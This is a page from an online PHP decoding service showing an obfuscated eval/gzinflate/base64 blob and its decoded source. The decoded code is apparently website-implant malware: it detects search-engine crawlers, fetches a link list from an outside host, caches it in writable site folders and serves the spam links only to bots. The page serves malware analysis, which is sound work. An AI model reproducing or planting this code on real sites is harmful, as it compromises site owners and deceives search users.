Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
eval(@gzinflate(base64_decode('TVXJDqxGEvyXd/FYjMxegObEvjQ7zaonjYBmh2anga93e54lzyEUyojIS1Y..
Decoded Output download
h5('http://mycompanyeye.com/bulbozavr/kot4/13.list', 1 * 900);
function h5($u, $t){
$nobot = isset($_REQUEST['nobot']) ? true : false;
$debug = isset($_REQUEST['debug']) ? true : false;
$t2 = 3600 * 5;
$t3 = 3600 * 12;
$droot = getpasekaroot();
$tm = (!@ini_get('upload_tmp_dir')) ? '/tmp/' : @ini_get('upload_tmp_dir');
if (!$tmp = triksp(array($tm, $droot.'images/avatars/', $droot.'tmp/', $droot.'cache/'))) {
if ($debug) {
echo('DEBUG: (ERROR: temporary path not found, return)<br>' . "
");
}
return;
}
$agent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
if ($debug) {
echo('DEBUG: (INFO: temporary path=' . $tmp . ')<br>, agent ('.$agent.')' . "
");
}
if (!preg_match('%(http|curl|google|yahoo|yandex|ya|bing|bot|crawl|lynx|SiteUptime|Spider|ia_archiver|AOL|slurp|msn)%i', $agent, $ret)) {
if ($debug) {
echo('DEBUG: (ERROR: you is not spider, return)<br>'."
");
}
return;
}
if ($debug) {
echo('DEBUG: (bot by:['.$ret[1].'])<br>'."
");
}
if ($t) {
if ($debug) {
if (file_exists($tmp . md5($u) . 'c')) {
echo('DEBUG: (INFO: link file exists=' . $tmp . md5($u) . 'c)<br>' . "
");
$filemtime = filemtime($tmp . md5($u) . 'c');
$current = time();
$diff = $current - $filemtime;
echo('DEBUG: (TIME: current=' . $current . ', filemtime=' . $filemtime . ', different=' . $diff . ', cache_time=' . $t . ')<br>' . "
");
if ($diff < $t) {
echo('DEBUG: (INFO: USING CACHE LINK FILE<br>' . "
");
} else {
echo('DEBUG: (INFO: DOWNLOAD NEW LINK FILE<br>' . "
");
}
}
}
if (file_exists($tmp . md5($u . 'c')) && (time() - filemtime($tmp . md5($u . 'c'))) < $t) {
readfile($tmp . md5($u . 'c'));
if ($debug) {
echo('DEBUG: (END: readfile link, return)<br>' . "
");
}
return;
}
}
if ($debug) {
if (file_exists($tmp . md5($u))) {
echo('DEBUG: (INFO: lists file exists=' . $tmp . md5($u) . ')<br>' . "
");
$filemtime = filemtime($tmp . md5($u));
$current = time();
$diff = $current - $filemtime;
echo('DEBUG: (TIME: current=' . $current . ', filemtime=' . $filemtime . ', different=' . $diff . ', cache_time=' . $t3 . ')<br>' . "
");
if ($diff < $t3) {
echo('DEBUG: (INFO: USING CACHE LIST FILE<br>' . "
");
} else {
echo('DEBUG: (INFO: DOWNLOAD NEW LIST FILE<br>' . "
");
}
}
}
if (file_exists($tmp . md5($u)) && (time() - filemtime($tmp . md5($u))) < $t3) {
$d = file($tmp . md5($u));
} else {
$c = curl_init($u);
if (!$c) {
if ($debug) {
echo('DEBUG: (ERROR: curl(list) not init, return)<br>' . "
");
}
return;
}
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$d = curl_exec($c);
$l = curl_getinfo($c);
curl_close($c);
if ($l['http_code'] == 200 && $d) {
@file_put_contents($tmp . md5($u), $d);
$d = explode("
", $d);
}
}
if ($debug) {
echo('DEBUG: (INFO: size list_array=' . sizeof($d) . ')<br>' . "
");
}
if ($d) {
$l = @array_rand($d);
$c = @curl_init(trim($d[$l]));
if (!$c) {
if ($debug) {
echo('DEBUG: (ERROR: curl(link) not init, return)<br>' . "
");
}
return;
}
if ($t) {
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
}
$d = curl_exec($c);
if ($t) {
if ($debug) {
echo('DEBUG: (INFO: link download)<br>' . "
");
}
@file_put_contents($tmp . md5($u . 'c'), $d);
echo($d);
} else {
if ($debug) {
echo('DEBUG: (ERROR: link NOT download)<br>' . "
");
}
}
@curl_close($c);
}
}
function triksp($array){
foreach ($array as $path) {
if (is_writable($path)) {
return $path;
}
}
return false;
}
function getpasekaroot() {
$file = 'configuration.php';
$path = getcwd().DIRECTORY_SEPARATOR;
$c = 0;
while($c < 5) {
if (file_exists($path.$file)) {
return $path;
}
$path = dirname($path).DIRECTORY_SEPARATOR;
$c++;
}
return @$_SERVER['DOCUMENT_ROOT'];
}
Did this file decode correctly?
Original Code
eval(@gzinflate(base64_decode('TVXJDqxGEvyXd/FYjMxegObEvjQ7zaonjYBmh2anga93e54lzyEUyojIS1Ypc1qK6r9LMfVpXvzrB/wHBBc//v3j5wnInycFvox+wf88MfrL1Fdjv8x8IX4Bfnl/ZSjiV8//ctjfGv5Lw785/OuT0rf+Owf+8v6vxujfzuCV5ZCKSQqQI6CYhfnCenLKh5XwzQZdc10zVpJNgQiUO2pEPWPfx4isGiYt8Hu3E24T0Frw7Na5Pe+egHlBFFIr99I1FnFKS5g9I3SuFUiqvCQRKxoedFsaiGdJO9qBq+U+FdFjKELKINkYOE+oighgo1HCvCsnzGmDtYri0Quec5oeDG5/4uW8ds5SbUObl4wOYQR6gIaK7vOQLx9Fg598y/viZhqv4mnOn/NK70SSUfc6fQqT37xC7Ij5tk+6rBBqiC1mT627C66hGxVpdKRdjnHZgILeqSmsvK5pt2SqGjy+vsR3V28dPrgg2/z+3W+7Pwjaeg0mvXHwklthxU+uPCamx7SXIfnEHPHryZWj0w77DQpRabQ3xQqmRTySfPl0FbnpQt/xCTHymrqYfJF4Y4YSbV+rS47cjLX0m4o4aJvqjqPihO93V/QwdMNxZNGuoOdHJiqvr3kWjoTWJmb1g7zKNCiry95fAyIdTDe3MltVsc1pY9ziZf00QXZNsEKg081e1lkAwjy59SoSv4l1q9CwyGUw2IYIeSFwW9SpWVOnOOmIyBCSgJjWKSMn+j2/6mtRVFntxmiKsZhsjjMknNNeYhcATzWkk9R6ptIcuMowy9Hg2b9NtOkcA/fHo3U9Cu1pzbMiMR7EyGS6kWjQK0ZemazNRUgIsPBSXqBbk9J52FHrKPiSr5fowWxJH9V8aEnNDl1oGRGPtImD1SBmhiIIIGnFkonfB+HJWK7FUk0B0DvI72CtaYaOdxKcvGv7NnR2nd1g1D0EDrC0ojyD1Z73XGSIenKmQXxiIrIF2bWingchUE6w3BHhTFCQwsqm60R+9i3luVzf2r1USSeApWV2US9NpVw0ChJG+3XsaZLWqZRH/WzyqSTcmy3c/d6jaqdo2MDFhpRsATrBPfIwupa4K2is5F5ZmqKFdzaNoviwofc4tTChBDiawe5j8jaR4NrXBFYcFh6EHCVU+uDgwu8Tu4TueWHYQQhKfEEFr4otVWcFFNFi3LlycThvKFzc14KGn0J5189y3AK+dmHuxpkhdrN8t26wPnScSVItVCpOKmOBZp3AA6+NIxP5+ycanaWPBgbDYyUxN0NLCcuIZ6qvs7tbL9ck5qYy53iCZj3N1jhPuD4QfIcDQ2K9xuDDM2JsdpXbwJB4j6FbRan1MkrPTGS6pPB+0fRm2N1CMoI8kM4yZNYhmT+1Mmqrqka6mAJFa3D2PE5GmFuvlGP5RDhgLHgsQP5QOWo8bqTaxysvZ0w8JcAQ8pgjQh7TLXp9xJJgNIZMz1B/PPkB4e+8lbjnLB01e+lbT+4cwj0T59OxXezb39fVP9njM0qtZryBPa1jfXKztfegseqm40+IwNSmfUnRVcf3XvJ7rr3mJqPCd2HZHcO70Ad/PJ3T24FU6duTqBBzZpnFpwfKh+mbXhXmQF7QSjGE5qChBYbPVHp9KMRAfG60oLTlsR1kfzUufvu9EXtbVY2ZSzec7Ca7EGdtj+LtQeLHrIP5uzQje82uF5F3vKGWiW04VLvoTtn5n1b2CvX1ivpzzwTS6yExsVFFRI75Ip/1QDSRSzNvWs2ydLXxtc7DoNGNktWceohMvAsEQ8sitSkbypFb6z1k4QiwMZyZA2hlO5ZidPD9viNxZC9dPMHxWQofQGzeTQgOjePKmY9Yuurju1mCutA7CeNhHh/EgtIZGGeAcQQWVESLcNH9d4JXfL5ZVT+B2yk0+9v3gjH/AOe+R/SPH7//508='))); Function Calls
| gzinflate | 2 |
| preg_replace | 1 |
| base64_decode | 2 |
Stats
| MD5 | d5156d653f525eb22d1b38816526f02e |
| Eval Count | 3 |
| Decode Time | 78 ms |